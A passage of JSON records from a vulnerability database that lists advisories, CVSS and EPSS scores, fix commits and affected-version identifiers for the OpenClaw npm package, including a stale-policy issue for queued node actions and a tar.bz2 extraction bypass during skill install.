-uuhb","summary":"OpenClaw may have stale policy enforcement for queued node actions\n## Summary\nQueued node actions were not revalidated against current command policy when later delivered, so stale allowlists or declarations could survive policy tightening.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- 
src/gateway/server-methods/nodes.ts now revalidates queued actions against the current allowlist and declared command set at delivery time.\n- src/gateway/server-methods/nodes.invoke-wake.test.ts includes the shipped stale-queue regression coverage.\n\nOpenClaw thanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35648","reference_id":"","reference_type":"","scores":[{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10859","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10896","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00035","scoring_system":"epss","scoring_elements":"0.10907","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35648"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com
/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/ec2c6d83b9f5f91d6d9094842e0f19b88e63e3e2"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-wj55-88gf-x564"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35648","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35648"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions","reference_id":"","reference_ty
pe":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:46:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-policy-bypass-via-unvalidated-queued-node-actions"},{"reference_url":"https://github.com/advisories/GHSA-wj55-88gf-x564","reference_id":"GHSA-wj55-88gf-x564","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wj55-88gf-x564"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{
"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{
"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{
"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{
"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35648","GHSA-wj55-88gf-x564"],"risk_score":1.6,"exp
loitability":"0.5","weighted_severity":"3.3","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wfkm-7ayk-uuhb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50655?format=json","vulnerability_id":"VCID-wfsp-szhr-r7eu","summary":"OpenClaw skills-install-download: tar.bz2 extraction bypassed archive safety parity checks (local DoS)\nThe `tar.bz2` installer path in `src/agents/skills-install-download.ts` used shell tar preflight/extract logic that did not share the same hardening guarantees as the centralized archive extractor.\n\nThis allowed crafted `.tar.bz2` archives to bypass special-entry blocking and extracted-size guardrails enforced on other archive paths, causing local availability impact during skill install.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/0dbb92dd2bcf9a32379d11c0f11ed016669dae3e","reference_id":"","reference_type":"","scores":[{"value":"5.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/0dbb92dd2bcf9a32379d11c0f11ed016669dae3e"},{"reference_url":"https://github.com/advisories/GHSA-77hf-7fqf-f227","reference_id":"GHSA-77hf-7fqf-f227","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-77hf-7fqf-f227"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77hf-7fqf-f227","reference_id":"GHSA-77hf-7fqf-f227","reference_type":"","scores":[{"value":"5.5","
scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-77hf-7fqf-f227"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74401?format=json","purl":"pkg:npm/openclaw@2026.3.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-1y7e-y41k-qyfc"},{"vulnerability":"VCID-21eb-723m-xkfu"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-2927-2whr-sudd"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2jsx-pvnr-6ydn"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulner
ability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-5u41-c7kc-u7fe"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-74bc-hfqh-cbcd"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84fd-3yvx-rfgq"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8v2w-jgh7-6ybq"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulner
ability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2t8-px5b-nfgd"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-aawy-8xg4-1uen"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-afkf-r949-dkgu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b7hq-mrhg-b3bk"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dsvn-dpb5-tfdz"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-ebwd-3xp4-7fdp"},{"vulner
ability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-edn6-zer1-cya4"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-ewa7-qswv-tqet"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-ftdn-9fum-cbe4"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-g9jn-c2rf-byem"},{"vulnerability":"VCID-gj27-bfws-uyfp"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gv2d-gfs7-gfh1"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h4av-vgqn-aqcn"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hse8-g1e9-